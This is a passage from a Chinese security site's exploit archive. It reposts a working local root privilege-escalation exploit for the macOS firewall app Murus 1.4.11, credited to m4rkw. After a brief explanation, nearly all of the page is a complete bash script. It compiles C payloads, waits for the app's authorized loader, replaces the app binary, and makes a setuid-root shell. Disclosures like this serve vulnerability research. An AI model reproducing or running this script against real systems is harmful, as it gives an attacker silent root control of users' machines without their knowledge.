首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Murus 1.4.11 - Local root Privilege Escalation
来源:https://m4.rkw.io/blog.html 作者:Wadham 发布时间:2017-12-06  
# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.
 
# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
# without the user knowing.
 
# https://m4.rkw.io/murus1.4.11.sh.txt
# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
# -------------------------------------------------------------------------------
#!/bin/bash
 
##################################################################
###### Murus 1.4.11 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################
 
echo "compiling payloads..."
 
cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
}
EOF
 
gcc -o /tmp/murus411_exp /tmp/murus411_exp.c
 
if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
    echo "failed to compile, dev tools may not be installed"
  exit 1
fi
 
rm -f /tmp/murus411_exp.c
 
cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
}
EOF
 
gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c
 
echo "waiting for loader..."
 
while :
do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
    break
  fi
done
 
echo "planting payload..."
 
mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus
 
echo "waiting for payload to trigger..."
 
while :
do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
done
 
echo "kapow"
 
/tmp/murus411_exp
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Arq 5.9.7 - Local root Privile
·Arq 5.9.6 - Local root Privile
·WinduCMS 3.1 - Local File Disc
·VX Search 10.2.14 - 'command_n
·Abyss Web Server < 2.11.6 - He
·Artica Web Proxy 3.06 - Remote
·MistServer 2.12 - Cross-Site S
·WinduCMS 3.1 Local File Disclo
·SocuSoft Co. Photo 2 Video Con
·aws-cfn-bootstrap Local Code E
·HP iMC Plat 7.2 - Remote Code
·HP iMC Plat 7.2 - Remote Code
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved